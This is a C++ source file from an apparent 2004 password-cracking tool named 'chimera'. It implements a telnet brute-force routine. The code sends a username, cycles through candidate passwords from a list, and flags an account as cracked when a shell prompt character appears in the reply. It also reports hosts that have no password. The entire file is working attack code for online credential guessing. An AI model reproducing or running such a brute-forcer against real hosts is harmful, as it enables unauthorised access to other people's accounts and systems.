/***************************************************************************
 *  service-telnet.cc : This file is part of 'chimera'
 *
 *  (c) 2004 by Lukasz Tomicki <tomicki@o2.pl>
 *
 ****************************************************************************/

/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Library General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */																										

#include "CServiceAttack.h"

using namespace std;

int CServiceAttack::service_telnet(thread_data *pData)
{	
	SOCKET sock = init_connection(pData);
	bool passwd_used(1);
	char buffer1[256];
	while (pData->state == WORKING) {
		if (!sock) {
			sock = init_connection(pData);
			continue;
		}
		
		char buffer2[256];
		sprintf(buffer2, "%s", pData->user);
		sendAll(sock, pData->ssl, buffer2, strlen(buffer2), 0, std_timeout);
		
		int s(0);
		do {
    		if (!recvAll(sock, pData->ssl, buffer2, 256, 0, std_timeout)) {
				close(sock);
				sock = 0;
				continue;
			}
    		if (index(buffer2, '/') || index(buffer2, '>') || 
				index(buffer2, '%') || index(buffer2, '$') || 
				index(buffer2, '#')) {
     			pData->state = DONE;
				if (pData->ipv6)
					output(MSG_BASIC, " host: %s is not password protected\n", 
						inet_ntoa(*((in_addr*)&pData->addr.sin6_addr)));
			
				else
					output(MSG_BASIC, " host: %s is not password protected\n", 
						inet_ntoa(((sockaddr_in*)&pData->addr)->sin_addr));
				
				close(sock);
				return 0;
    		}
			make_lowercase(buffer2);
    		if (strstr(buffer2, "asswor") || strstr(buffer2, "asscode") || 
				strstr(buffer2, "ennwort"))
       			s = 1;
			
    		if (!s && ((strstr(buffer2, "login:") && 
				!strstr(buffer2, "last login")) || strstr(buffer2, "sername:"))) {
     			pData->state = DONE;
				if (pData->ipv6)
					output(MSG_BASIC, " host: %s is not password protected\n", 
						inet_ntoa(*((in_addr*)&pData->addr.sin6_addr)));
			
				else
					output(MSG_BASIC, " host: %s is not password protected\n", 
						inet_ntoa(((sockaddr_in*)&pData->addr)->sin_addr));
				
				close(sock);
				return 0;
    		}
  		} while (!s);
		
		if (passwd_used) {
			if (!get_next_passwd(pData, buffer1, 256)) {
				pData->state = DONE;
				continue;
			}
			passwd_used = false;
		}
		sprintf(buffer2, "%s", buffer1);
		
		sendAll(sock, pData->ssl, buffer2, strlen(buffer2), 0, std_timeout);
		
		output(MSG_VERBOSE, "[1] %s\n", buffer2);
		s = 0;
		do {
    		if (!recvAll(sock, pData->ssl, buffer2, 256, 0, std_timeout)) {
				close(sock);
				sock = 0;
				continue;
			}	
			make_lowercase(buffer2);
			
			if ((!strstr(buffer2, "login:") || strstr(buffer2, "last login:")) 
				&& !strstr(buffer2, "sername:"))
				s = 0;
			else 
				s = 1;
			
			if (index(buffer2, '/') || index(buffer2, '>') || index(buffer2, '%')
				|| index(buffer2, '$') || index(buffer2, '#')) {
				account_cracked(pData, buffer1);
			}
			  
		} while (!s);
		
		passwd_used = true;
	}
	close(sock);
	return 0;
}

void CServiceAttack::make_lowercase(char* p)
{
	for (int i(0); p[i]; ++i) {
		if (p[i] >= 'A' && p[i] <= 'Z')
			p[i] += 32;
	}
}
